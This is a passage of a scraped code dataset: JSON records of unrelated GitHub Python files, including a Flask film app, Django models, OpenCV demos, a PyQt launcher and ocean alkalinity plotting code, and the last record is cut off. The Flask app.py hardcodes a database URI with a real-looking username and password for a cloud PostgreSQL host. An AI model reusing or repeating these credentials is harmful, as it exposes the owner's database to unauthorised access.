#pojawianie się pociągów\n if (GameParameters.can_spawn == True and GameParameters.paused == False):\n GameParameters.train += train_generator(player)\n GameParameters.can_spawn = False\n\n#tekstura nieba\nSky(texture='assets/night.jpg')\napp.run()\n","repo_name":"BartoszKaca/subway_clone","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"9948245835","text":"import os\nimport shutil\n\nfrom populus import ASSETS_DIR\n\nfrom populus.config.helpers import (\n check_if_json_config_file_exists,\n)\n\nfrom populus.utils.filesystem import (\n ensure_path_exists,\n)\n\nfrom populus.project import (\n Project,\n)\n\nGREETER_SOURCE_PATH = os.path.join(ASSETS_DIR, 'Greeter.sol')\nGREETER_TEST_PATH = os.path.join(ASSETS_DIR, 'test_greeter.py')\n\n\ndef init_project(project_dir, logger):\n\n if project_dir is None:\n project_dir = os.getcwd()\n else:\n project_dir = os.path.abspath(project_dir)\n\n has_json_config = check_if_json_config_file_exists(project_dir)\n\n if has_json_config:\n logger.info(\n \"Found existing `project.json` file. Not writing default config.\"\n )\n\n project = Project(project_dir, create_config_file=True)\n logger.info(\n \"Wrote default populus configuration to `./{0}`.\".format(\n os.path.relpath(project.config_file_path),\n )\n )\n\n for source_dir in project.contracts_source_dirs:\n if ensure_path_exists(source_dir):\n logger.info(\n \"Created Directory: ./{0}\".format(\n os.path.relpath(source_dir)\n )\n )\n\n example_contract_path = os.path.join(project.contracts_source_dirs[0], 'Greeter.sol')\n if not os.path.exists(example_contract_path):\n shutil.copy(GREETER_SOURCE_PATH, example_contract_path)\n logger.info(\"Created Example Contract: ./{0}\".format(\n os.path.relpath(example_contract_path)\n ))\n\n tests_dir = os.path.join(project.project_dir, 'tests')\n if ensure_path_exists(tests_dir):\n logger.info(\"Created Directory: ./{0}\".format(os.path.relpath(tests_dir)))\n\n example_tests_path = os.path.join(tests_dir, 'test_greeter.py')\n if not os.path.exists(example_tests_path):\n shutil.copy(GREETER_TEST_PATH, example_tests_path)\n logger.info(\"Created Example Tests: ./{0}\".format(\n os.path.relpath(example_tests_path)\n ))\n\n return project\n","repo_name":"veox/populllus","sub_path":"populus/api/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"}
+{"seq_id":"16995593840","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread('kingfisher.jpg', cv2.IMREAD_COLOR)\n\n# Draw a line on the image\ncv2.line(img, (10,10), (600, 700), (255,255,255), 10)\n\n# Draw a rectangel on the image\n\ncv2.rectangle(img, (10, 15), (250, 300), (155, 100, 10), 5)\n\n# Draw a circle\n\ncv2.circle(img, (225, 335), 100,(0,100, 25) , -1 )\n\n# Draw a polygon\n\npts = np.array([[10, 10], [25, 30], [50, 65], [70, 80], [80, 10]], np.int32)\ncv2.polylines(img, [pts], True, (200,15,100))\n\n# Write a text in the image\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\ncv2.putText(img, 'Kingfisher image', (1,100), font, 1, (201, 222, 100), 2, cv2.LINE_AA)\n\n# plotting from cv2\n\ncv2.imshow('image', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n","repo_name":"Nirkan/Computer-Vision-Python","sub_path":"OpenCV-Tutorials/opcv3.py","file_name":"opcv3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"75354972691","text":"import os\nfrom pdb import set_trace\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask import render_template\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import Table, Column, Integer, ForeignKey\nimport pdb\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = \"postgres://imperial:imperial-fdt-online-2019-colossal-shelf@imperial-2021.ckp3dl3vzxoh.eu-west-2.rds.amazonaws.com:5432/dvdrental\"\ndb = SQLAlchemy(app)\n\n\n\nclass Inventory(db.Model):\n film_id = db.Column(db.Integer(), primary_key=True)\n inventory_id = db.Column(db.Integer(), ForeignKey('film.film_id'))\n store_id = db.Column(db.Integer())\n\n def __repr__(self):\n return 'Inventory ID: '+str(self.inventory_id)\n\nclass Film(db.Model):\n __tablename__ = 'film'\n film_id = db.Column(db.Integer, primary_key=True)\n\n title = db.Column(db.String(255), index=True, unique=True)\n description = db.Column(db.String())\n\n copies = relationship('Inventory')\n\n\n def __repr__(self):\n return 'FILM: title is ' + self.title\n\n\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return \"Hello, World?\"\n\n\n\n\n\n@app.route('/films')\ndef films():\n films = Film.query.all()\n\n # print(films[0].description)\n\n return render_template('films.html', films = films)\n\n\n\n\nif __name__ == \"__main__\":\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n\n","repo_name":"PrashantLonikar/assignment5","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33970922302","text":"def json_prep(items):\n \"\"\"Convert a model-type object into a JSON-serializable object.\n\n Keyword Arguments:\n items -- the model-type object to be converted.\n \"\"\"\n\n # If the object is a list, convert it to a list of dictionaries.\n if isinstance(items, type([])):\n prepped = []\n for item in items:\n prepped_item = {\n 'id': item.id,\n 'name': item.name,\n 'sport': item.sport,\n 'category': item.category,\n 'description': item.description,\n 'date': item.date,\n 'user': item.user.username\n }\n prepped.append(prepped_item)\n return {'items': prepped}\n\n # If the object is not a list, convert it to a dictionary.\n else:\n prepped = {\n 'id': items.id,\n 'name': items.name,\n 'sport': items.sport,\n 'category': items.category,\n 'description': items.description,\n 'date': items.date,\n 'user': items.user.username\n }\n return {'item': prepped}\n","repo_name":"davidhammaker/Item_Catalog","sub_path":"item_catalog/jsons/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5774877610","text":"from django.db import models\nfrom edc_base.model_mixins import BaseUuidModel\nfrom edc_base.sites.site_model_mixin import SiteModelMixin\n\nfrom .contracting import Contracting\n\n\nclass JobPerformanceKpa(BaseUuidModel, SiteModelMixin, models.Model):\n\n contracting = models.ForeignKey(\n Contracting,\n on_delete=models.PROTECT)\n\n key_performance_area = models.CharField(\n verbose_name='KEY PERFORMANCE AREAS',\n max_length=100)\n\n kpa_tasks = models.TextField(\n verbose_name='TASKS',\n max_length=1000)\n\n kpa_performance_indicators = models.TextField(\n verbose_name='PERFORMANCE INDICATORS'\n '(completion dates)',\n max_length=1000)\n\n skills_required = models.TextField(\n verbose_name=\"SKILLS REQUIRED\",\n max_length=100)\n\n class Meta:\n verbose_name = 'Job Performance KPA'\n verbose_name_plural = 'Job Performance KPA'\n","repo_name":"Botswana-Harvard-Utility-Systems/bhp-personnel","sub_path":"bhp_personnel/models/job_performance_kpa.py","file_name":"job_performance_kpa.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5124537764","text":"from sqlalchemy import case\nfrom flaskapp.models import Restaurant, MenuItem, Courses\nfrom flaskapp import db\n\n\nclass DBAccess:\n @staticmethod\n def getRestaurant(restaurantId: int) -> Restaurant:\n return db.session.query(Restaurant) \\\n .filter_by(id=restaurantId).first()\n\n @staticmethod\n def getMenuItem(menuId: int) -> MenuItem:\n return db.session.query(MenuItem).filter_by(id=menuId).first()\n\n @staticmethod\n def getRestaurants():\n return db.session.query(Restaurant).order_by(Restaurant.name)\n \n @staticmethod\n def getCourses(restaurantId: int):\n sort_order = case(value=MenuItem.course, whens=Courses)\n return db.session.query(MenuItem.course).distinct().filter_by(\n restaurant_id=restaurantId).order_by(sort_order)\n\n @staticmethod\n def getMenuItems(restaurantId: int):\n return db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId)\n\n @staticmethod\n def getMenuItemsByCourse(restaurantId: int):\n return [(course[0], db.session.query(MenuItem).filter_by(\n restaurant_id=restaurantId,\n course=course[0]))\n for course\n in DBAccess.getCourses(restaurantId)]\n\n @staticmethod\n def createNewRestaurant(name: str):\n new_restaurant = Restaurant(\n name=name)\n db.session.add(new_restaurant)\n db.session.commit()\n\n @staticmethod\n def createNewMenuItem(restaurantId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n new_menu_item = MenuItem(\n name=name,\n price=price,\n description=description,\n restaurant_id=restaurantId,\n course=course,\n )\n db.session.add(new_menu_item)\n db.session.commit()\n\n @staticmethod\n def renameRestaurant(restaurantId: int, name: str):\n restaurant = DBAccess.getRestaurant(restaurantId)\n restaurant.name = name\n db.session.commit()\n\n @staticmethod\n def editMenuItem(menuId: int,\n name: str,\n price: str,\n description: str,\n course: str):\n menu_item = DBAccess.getMenuItem(menuId=menuId)\n menu_item.name = name\n menu_item.price = price\n menu_item.description = description\n menu_item.course = course\n db.session.commit()\n\n @staticmethod\n def deleteRestaurant(restaurantId: int):\n db.session.delete(DBAccess.getRestaurant(restaurantId))\n db.session.commit()\n\n @staticmethod\n def deleteMenuItem(menuId: int):\n db.session.delete(DBAccess.getMenuItem(menuId=menuId))\n db.session.commit()\n","repo_name":"hgihem/FlaskTutorial","sub_path":"flaskapp/database_access.py","file_name":"database_access.py","file_ext":"py","file_size_in_byte":2925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"6496892371","text":"'''Comprehension'''\n# синтаксический сахар - упращение кода\n\n# генерация последовательности в одну строку используя цикл (синтаксический сахар)\n\n# list, set, dict\n'''Синтаксис'''\n# result for element in iterable_object\n# result for element in iterable_object if filter \n\n'''====== LIst comprehension ======'''\n''' Упрощенный подход к созданию списка, задействует цикл for и if-else. Работает быстрее чем обычный'''\n# \n\n''' for '''\n# list_=[]\n# for i in range(11):\n# list_.append(i)\n# print(list_)\n\n# a=list((i for i in range(11)))\n# print(a)\n\n# list_=[i for i in range(11)]\n# print(list_)\n# '''#\n'''засекаем время'''\n# import time\n# start_time= time.time()\n\n# list_=[]\n# for i in range(100000):\n# list_.append(i)\n# time1= time.time()- start_time\n\n# start_time = time.time()\n# list_2=[i for i in range(11)]\n# time2= time.time()- start_time\n# print( time1, time2)\n\n''' if '''\n# \n# list_=[]\n# for i in range(11):\n# if i%2==0:\n# list_.append(i)\n# print(list_)\n\n# list_2=[i for i in range(11) if i%2==0]\n# print(list_2)\n# \n\n# list_2=[i for i in range(0,11,2)]\n# print(list_2)\n\n# list_2=[i for i in range(11) if not i%2]\n# print(list_2)\n\n\n# a=['hello'for i in range(10)]\n# print(a) #['hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello', 'hello']\n\n# print([input() for i in range(2)]) на каждой итерации запрашивает ввод(input)\n\n''' if- else . Если в условии нужен else, то все условие пишется перед for'''\n# list_2=[i if not i%2 else 'hello' for i in range(11) ]\n# print(list_2) #[0, 'hello', 2, 'hello', 4, 'hello', 6, 'hello', 8, 'hello', 10]\n'''задача '''\n# list_1 =[1,'hello', 3, 'a', 4.0, 6, 8, 'hw']\n# l=['четное' if i%2==0 else 'нечетное' for i in list_1 if type(i)==int or type(i)== float]\n# print(l) #['нечетное', 'нечетное', 'четное', 'четное', 'четное']\n\n\n\n''' set comprehension'''\n# почти тоже самое как и представление списков(list comprehension)\n# Используются {} скобки, не содержит дубликатов, не гарнтирует сохранность элементов в порядке\n\n# list_=[1,2,3,4,5,4,5,3,2]\n# set_={i for i in list_}\n# print(set_) #{1, 2, 3, 4, 5}\n\n# set_= set()\n# for i in list_:\n# set_.add(i)\n# print(set_)\n\n''' dict comprehension'''\n# необходимо дополнительно определить ключ\n\n# dict_={i: i for i in range(10)}\n# print(dict_) #{0: 0, 1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9}\n\n# dic={}\n# for i in range(10):\n# dic.update({i: i**2})\n# print(dic) #{0: 0, 1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64, 9: 81}\n\n# l=[1,1,2,3,2,2,3,4,5]\n# li={i: l.count(i) for i in l}\n# print(li) #{1: 2, 2: 3, 3: 2, 4: 1, 5: 1}\n\n# d={'a':2, 'b':3}\n# l={k: 'четное' if v%2==0 else 'нечетное' for k,v in d.items() }\n# print(l) #{'a': 'четное', 'b': 'нечетное'}\n'''создать словарь, где ключи- это числа от 1 до 10, а значения эти же числа в виде строки'''\n# d={i: str(i) for i in range(1,11)}\n# print(d)\n\n''''''\n# l1=[1,2,3,4,5]\n# l2=['a','b','c','d','e']\n# d={ l1[i]: l2[i] for i in range(len(l1))}\n# print(d) #{1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e'}\n\n\n''' вложенные comprehension'''\n# d={i: list(range(1,i+1)) for i in range(1,6)}\n# print(d)\n\n# d={i: [j for j in range(1,i+1)] for i in range(1,6)} # вложенность\n# print(d)\n\n''''''\n# l=[['hello world' for i in range(5)] for j in range(10)]\n# print(l)\n\nemployees = {\n 'id1': {\n 'first name': 'Александр',\n 'last name' : 'Иванов',\n 'age': 30,\n 'job':'программист'\n },\n 'id2': {\n 'first name': 'Ольга',\n 'last name' : 
'Петрова',\n 'age': 35,\n 'job':'ML-engineer'\n }}\n# for info in employees.values():\n# for k,v in info.items():\n# if k=='age':\n# info[k] = float(v)\n# print(employees)\n\n# print({id_: {k: float(v) if k=='age' else v for k,v in info.items()} for id_, info in employees.items()})\n# # info == {k: float(v) if k=='age' else v for k,v in info.items()}","repo_name":"clara8luna/lessons_py_27_ev","sub_path":"comprehensions.py","file_name":"comprehensions.py","file_ext":"py","file_size_in_byte":4508,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"28848963243","text":"class Solution:\n def findPoisonedDuration(self, timeSeries: List[int], duration: int) -> int:\n \n if not timeSeries: return 0\n \n poisoned_time = 0\n for i in range(len(timeSeries)-1):\n poisoned_time += min(duration, timeSeries[i+1] - timeSeries[i])\n \n return poisoned_time + duration\n","repo_name":"shoaibur/Software-Engineering","sub_path":"Leetcoding-Actions/Explore-Monthly-Challenges/2020-09/26-Teemo-Attacking.py","file_name":"26-Teemo-Attacking.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"}
+{"seq_id":"31482701896","text":"from django.contrib.sites.shortcuts import get_current_site\n\n\nclass SiteFilteredViewMixin(object):\n\n site_field = 'site'\n\n def get_queryset(self):\n qs = super(SiteFilteredViewMixin, self).get_queryset()\n kwargs = {\n self.site_field: get_current_site(self.request),\n }\n return qs.filter(**kwargs)\n","repo_name":"fdemmer/airavata","sub_path":"airavata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"72764200210","text":"from PyQt5 import QtWidgets, uic, QtCore\nimport sys, os, glob, json\n\n\nclass Ui(QtWidgets.QMainWindow):\n def __init__(self):\n super(Ui, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('UiTOF.ui', self) # Load the .ui file\n self.searchB.clicked.connect(self.click_s)\n self.exeB.clicked.connect(self.exe)\n self.scrfold = (\"/home/mgiacalo/GitHub/\",\"/home/mgiacalo/alice/alidist/\")\n self.diction = {}\n paths, names = self.getFiles()\n dictL = {names[i]: paths[i] for i in range(len(paths))}\n self.setupDict(dictL)\n names.sort()\n self.fillCombo(names)\n\n self.show() # Show the GUI\n \n def fillCombo(self, fill):\n self.comboBox.addItems(fill) \n\n def click_s(self):\n index = self.comboBox.findText(self.lsearch.text(), QtCore.Qt.MatchFixedString|QtCore.Qt.MatchContains)\n if index != -1:\n self.comboBox.setCurrentIndex(index)\n else: \n self.lsearch.setText(\"Not FOUND\") \n\n def setupDict(self, Dict):\n self.diction = Dict\n\n def exe(self):\n print(self.diction[self.comboBox.currentText()]) \n\n def getFiles(self):\n paths = []\n names = []\n for fol in self.scrfold:\n os.chdir(fol)\n for file in glob.glob(\"*.sh\"):\n paths.append(fol + file)\n names.append(file) \n return paths, names \n\napp = QtWidgets.QApplication(sys.argv)\nwindow = Ui()\napp.exec_() ","repo_name":"jackal1-66/UiTOF","sub_path":"UiTOF_V3.py","file_name":"UiTOF_V3.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"34714430087","text":"import xarray as xr\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport matplotlib as mpl\nimport seaborn as sns\nfrom datetime import datetime\nfrom pandas.plotting import register_matplotlib_converters\n\nsns.set()\nregister_matplotlib_converters()\n\n# sets up pandas table display\npd.set_option('display.width', 500)\npd.set_option('display.max_columns', 100)\npd.set_option('display.notebook_repr_html', True)\npd.options.mode.chained_assignment = None\nfont = {'family': 'normal',\n 'weight': 'bold',\n 'size': 22}\nLNW = 2\nFNTSZ = 14\nLGNDSZ = 14\nmpl.rcParams['xtick.labelsize'] = LGNDSZ\nmpl.rcParams['ytick.labelsize'] = LGNDSZ\nSTART = '2011-01-01'\nSTOP = '2011-12-31'\nX_TEXT = 0.97\nY_TEXT = 0.98\n\nALK_VAR = 'B_C_Alk'\nALKFLUX_VAR = 'B_C_Alk _flux'\n\n\ndef addseason(datestring):\n \"\"\"Classifies season\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n if 2 < item.month < 6:\n return 'spring'\n elif 5 < item.month < 9:\n return 'summer'\n elif 8 < item.month < 12:\n return 'autumn'\n else:\n return 'winter'\n\n\ndef addmonth(datestring):\n \"\"\"Classifies month\"\"\"\n\n item = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n year = {1: 'january', 2: 'february', 3: 'march', 4: 'april',\n 5: 'may', 6: 'june', 7: 'july', 8: 'august', 9: 'september',\n 10: 'october', 11: 'november', 12: 'december'}\n return year[item.month]\n\n\ndef addseconds(datestring):\n t = datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addsecondstolvl(datestring):\n datestring = datestring[0:-4]\n t = datetime.strptime(datestring, \"%d/%m/%Y %H:%M:%S\")\n return (t - datetime(2017, 1, 1)).total_seconds()\n\n\ndef addband(longitude):\n if 6.95 < longitude < 7:\n return 1\n else:\n return 0\n\n\ndef addphase(seconds):\n period = (12 * 60 * 60) + (25.2 * 60)\n half_period = period / 2\n startphase = (half_period / 12) * 8\n modulus = (seconds - startphase) % period\n if modulus < half_period:\n return 'low'\n else:\n return 'high'\n\n\ndef addphase_2(slev):\n if slev > 0:\n return 'high'\n else:\n return 'low'\n\n\ndef commafix(string):\n return float(string.replace(',', '.'))\n\n\ndef calculateTA(method, t, s):\n if method == 'Bellerby':\n if s >= 34.65:\n return 66.96 * s - 36.803 # Bellerby & Canoba\n else:\n return 3887 - 46.25 * s # Borges & Frankignoulle & Canoba\n elif method == 'Millero':\n if t < 20:\n return (s / 35 * (2291 - 2.69 * (t - 20)\n - 0.046 * np.square(t - 20)))\n else:\n return 520.1 + 51.24 * s # Millero et al, MarChem, 1998\n\n\ndef treatlvl(sealvldata):\n sealvldata['Seconds_since_start_of_the_year'] \\\n = sealvldata.TIME.map(addsecondstolvl)\n try:\n sealvldata['SLEV'] = sealvldata.SLEV.map(commafix)\n except AttributeError:\n pass\n sealvldata = sealvldata[sealvldata.SLEV.values[:] != -999]\n sealvldata['Phase'] = sealvldata.SLEV.map(addphase_2)\n return sealvldata\n\n\ndef treatbiogeodata(biogeodata):\n \"\"\"Process the data\"\"\"\n biogeodata['Season'] = biogeodata.Datetime.map(addseason)\n biogeodata['Month'] = biogeodata.Datetime.map(addmonth)\n biogeodata['Seconds_since_start_of_the_year'] \\\n = biogeodata.Datetime.map(addseconds)\n biogeodata['TAfromS'] = [calculateTA('Millero', t, s)\n for t, s in zip(biogeodata.Temperature.values,\n biogeodata.Salinity.values)]\n return biogeodata\n\n\ndef addlvlphase(biogeodata, sealvldata):\n \"\"\"Biogeodata and sealvldata for the current 
month\"\"\"\n biogeodata['SLEV'] \\\n = [np.interp(x,\n sealvldata.Seconds_since_start_of_the_year.values,\n sealvldata.SLEV.values)\n for x in biogeodata.Seconds_since_start_of_the_year.values]\n biogeodata['Phase'] = biogeodata.SLEV.map(addphase_2)\n return biogeodata\n\n\ndef returndate(datestring):\n return datetime.strptime(datestring, \"%Y-%m-%d %H:%M:%S\")\n\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i/inch for i in tupl[0])\n else:\n return tuple(i/inch for i in tupl)\n\n\ndef plotTA(biogeodata):\n fig, ax = plt.subplots(figsize=(12, 5), constrained_layout=True)\n Time = biogeodata.Datetime.map(returndate).values\n TA = biogeodata.TA.values\n TAfromS = biogeodata.TAfromS.values\n size = FNTSZ\n ax.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n ax.scatter(Time, TA, label='Total Alkalinity, measured', s=size)\n ax.scatter(Time, TAfromS,\n label='Total Alkalinity, calculated from salinity',\n s=size)\n for item in ([ax.title, ax.xaxis.label, ax.yaxis.label] +\n ax.get_xticklabels() + ax.get_yticklabels()):\n item.set_fontsize(FNTSZ)\n ax.legend(loc='upper left', fontsize=LGNDSZ)\n plt.ylabel('Total Alkalinity, $\\mu M$')\n plt.show()\n\n\ndef plot_intro():\n north7 = pd.read_csv(\"data/HafniaDataNorth7Shamil.csv\")\n north7 = treatbiogeodata(north7)\n plotTA(north7)\n\n\ndef get_data_time(dtsts):\n alk_year, alkflux_bottom_year = [], []\n\n for i, ds in enumerate((dtsts), start=0):\n alk_df = ds[ALK_VAR].to_dataframe()\n alkflux_df = ds[ALKFLUX_VAR].to_dataframe()\n alk = alk_df.groupby('z').get_group(0.625).reset_index('z', drop=True)\n alkflux_bottom = alkflux_df.groupby('z_faces').get_group(2.5)\n alkflux_bottom = alkflux_bottom.reset_index('z_faces', drop=True)\n\n alk_year.append(alk[START:STOP])\n alkflux_bottom_year.append(alkflux_bottom[START:STOP])\n alk_year[i] = alk_year[i].reset_index()\n alkflux_bottom_year[i] = alkflux_bottom_year[i].reset_index()\n alk_year[i][ALK_VAR] = alk_year[i][ALK_VAR]-alk_year[i][ALK_VAR].min()\n\n return alk_year, alkflux_bottom_year\n\n\ndef plot_alkalinity_flux_low_high():\n base_path = 'data/results'\n ds1 = xr.open_dataset('{}/2_po75-25_di1e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/3_po75-25_di2e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/4_po75-25_di5e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/5_po75-25_di10e-9/water.nc'.format(base_path))\n ds5 = xr.open_dataset('{}/6_po75-25_di15e-9/water.nc'.format(base_path))\n ds6 = xr.open_dataset('{}/7_po75-25_di20e-9/water.nc'.format(base_path))\n ds7 = xr.open_dataset('{}/8_po75-25_di25e-9/water.nc'.format(base_path))\n ds8 = xr.open_dataset('{}/9_po75-25_di30e-9/water.nc'.format(base_path))\n ds9 = xr.open_dataset('{}/10_po75-25_di35e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds1, ds2, ds3, ds4, ds5,\n ds6, ds7, ds8, ds9])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(2, 1, 1)\n ax1 = fig.add_subplot(2, 1, 2)\n\n labels = [r'$1e-9$', r'$2e-9$', r'$5e-9$', r'$10e-9$', r'$15e-9$',\n r'$20e-9$', r'$25e-9$', r'$30e-9$', r'$35e-9$']\n\n for n in range(0, 9):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('TA fluxes, mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax1.set_ylabel('Relative TA, mmol m$^{-3}$', fontsize=FNTSZ)\n ax.legend(loc='best', title='$kz_{dispersion}$, m$^2$ 
s$^{-1}$',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n plt.show()\n\n\ndef plot_alkalinity_flux_sulfur_oxidation():\n\n ds0 = xr.open_dataset('data/different_sulfur_oxidation/high/water.nc')\n ds1 = xr.open_dataset('data/different_sulfur_oxidation/low/water.nc')\n ds2 = xr.open_dataset('data/different_sulfur_oxidation/regular/water.nc')\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2])\n\n fig = plt.figure(figsize=cm2inch(30, 10))\n ax = fig.add_subplot(1, 2, 1)\n ax1 = fig.add_subplot(1, 2, 2)\n\n labels = ['high', 'low', 'base']\n for n in range(0, 3):\n ax.plot(alkflux_bottom_year[n]['time'],\n alkflux_bottom_year[n][ALKFLUX_VAR],\n linewidth=LNW, label=labels[n])\n ax1.plot(alk_year[n]['time'], alk_year[n][ALK_VAR],\n linewidth=LNW, label=labels[n])\n\n ax.set_ylabel('mmol m$^{-2}$ d$^{-1}$', fontsize=FNTSZ)\n ax.set_title('TA fluxes', fontsize=FNTSZ)\n ax1.set_ylabel('mmol m$^{-3}$', fontsize=FNTSZ)\n ax1.set_title('Relative Total Alkalinity', fontsize=FNTSZ)\n\n labels = ('(A) ', '(B)')\n for i, axis in enumerate((ax, ax1)):\n axis.text(X_TEXT, Y_TEXT, labels[i], transform=axis.transAxes,\n fontsize=FNTSZ, fontweight='bold', va='top', ha='right')\n axis.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n\n ax.legend(loc='upper left', title='Sulfur compounds \\noxidation rates',\n fontsize=LGNDSZ, title_fontsize=LGNDSZ)\n plt.show()\n\n\ndef plot_alkalinity_flux_porosities1_2_3():\n\n base_path = 'data/different_porosities'\n ds0 = xr.open_dataset('{}/4_po45-25_di10e-9/water.nc'.format(base_path))\n ds1 = xr.open_dataset('{}/0_po55-25_di10e-9/water.nc'.format(base_path))\n ds2 = xr.open_dataset('{}/1_po65-25_di10e-9/water.nc'.format(base_path))\n ds3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds4 = xr.open_dataset('{}/3_po85-25_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_2'\n ds0_2 = xr.open_dataset('{}/0_po75-05_di10e-9/water.nc'.format(base_path))\n ds1_2 = xr.open_dataset('{}/1_po75-15_di10e-9/water.nc'.format(base_path))\n ds2_2 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_2 = xr.open_dataset('{}/3_po75-35_di10e-9/water.nc'.format(base_path))\n\n base_path = 'data/different_porosities_3'\n ds0_3 = xr.open_dataset('{}/0_po63-32_di10e-9/water.nc'.format(base_path))\n ds1_3 = xr.open_dataset('{}/1_po70-28_di10e-9/water.nc'.format(base_path))\n ds2_3 = xr.open_dataset('{}/2_po75-25_di10e-9/water.nc'.format(base_path))\n ds3_3 = xr.open_dataset('{}/3_po82-21_di10e-9/water.nc'.format(base_path))\n\n alk_year, alkflux_bottom_year = get_data_time([ds0, ds1, ds2, ds3, ds4])\n alk_year_2, alkflux_bottom_year_2 = get_data_time([ds0_2, ds1_2,\n ds2_2, ds3_2])\n alk_year_3, alkflux_bottom_year_3 = get_data_time([ds0_3, ds1_3,\n ds2_3, ds3_3])\n\n fig = plt.figure(figsize=(12, 10))\n ax = fig.add_subplot(3, 2, 1)\n ax1 = fig.add_subplot(3, 2, 2)\n ax_2 = fig.add_subplot(3, 2, 3)\n ax1_2 = fig.add_subplot(3, 2, 4)\n ax1_3 = fig.add_subplot(3, 2, 6)\n ax_3 = fig.add_subplot(3, 2, 5)\n\n labels = ('0.45-0.25', '0.55-0.25', '0.65-0.25', '0.75-0.25', '0.85-0.25')\n labels_2 = ('0.75-0.05', '0.75-0.15', '0.75-0.25', '0.75-0.35')\n labels_3 = ('0.63-0.32', '0.70-0.28', '0.75-0.25', '0.82-0.21')\n\n for n in range(0, 5):\n 
